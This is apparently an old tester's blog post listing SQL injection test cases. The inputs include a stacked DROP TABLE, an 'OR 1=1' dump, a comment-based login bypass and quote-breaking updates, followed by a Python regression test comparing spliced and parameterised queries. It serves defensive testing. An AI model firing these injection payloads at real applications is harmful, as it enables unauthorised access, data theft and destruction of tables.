SQL Injection Test Cases
2012-10-08 16:38:19 / Category: Project Skills Summary
1. Drop table. Guess a table name and drop it; note the following statement:
Select * from A where A.a = 'testdata'; drop table A---';
2. If a field only allows numbers, give it a string or another type of value.
3. Use 'OR 1=1' to get all records in a query function:
Select * from A where A.a = 'testdata' OR '1'='1';
4. In the login function, give the user name field a value like 'username'--' so that "--' and A.password = ''" is commented out:
Select * from user A where A.username = 'username'--' and A.password = '';
5. In the add-records function, if there are 4 fields in the table, add 5 fields, e.g.
Normal: Insert into A values('','','','');
Data: Insert into A values('','testdata','','','');
6. Input test data that is in or out of this field's data.
7. Add single quotation marks and a semicolon to break off the string splicing; this is similar to point 4:
Update A set A.a = 'testdata';--'
The yellow part is the test data we input.
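The test data from points 3 and 4 can be run as a regression check, shown here as an added example that is not part of the original post. It uses Python's sqlite3 with a constructed in-memory `user` table (the table contents and the function names are assumptions) and compares a query built by string splicing with the same query using bound parameters.

```python
import sqlite3

def make_db():
    # Constructed fixture: table, columns and rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user (username TEXT, password TEXT);
        INSERT INTO user VALUES ('alice', 's3cret');
        INSERT INTO user VALUES ('bob', 'hunter2');
    """)
    return db

def search_spliced(db, name):
    # Vulnerable form: the input is spliced into the SQL text.
    sql = "SELECT username FROM user WHERE username = '" + name + "'"
    return sorted(r[0] for r in db.execute(sql))

def search_bound(db, name):
    # Hardened form: the input is passed as a bound parameter.
    sql = "SELECT username FROM user WHERE username = ?"
    return sorted(r[0] for r in db.execute(sql, (name,)))

def login_spliced(db, name, password):
    # Vulnerable form of the login query from point 4.
    sql = ("SELECT username FROM user WHERE username = '" + name +
           "' AND password = '" + password + "'")
    return sorted(r[0] for r in db.execute(sql))

def login_bound(db, name, password):
    # Hardened form: both fields are bound, never parsed as SQL.
    sql = "SELECT username FROM user WHERE username = ? AND password = ?"
    return sorted(r[0] for r in db.execute(sql, (name, password)))

def run_cases():
    db = make_db()
    or_true = "testdata' OR '1'='1"   # point 3 test data
    comment = "alice'--"              # point 4 test data, constructed user name
    return {
        "point3_spliced": search_spliced(db, or_true),
        "point3_bound": search_bound(db, or_true),
        "point4_spliced": login_spliced(db, comment, ""),
        "point4_bound": login_bound(db, comment, ""),
    }

if __name__ == "__main__":
    for case, rows in run_cases().items():
        print(case, rows)
```

A test passes when the bound variants return no rows for this test data; any rows returned mean the input was interpreted as SQL.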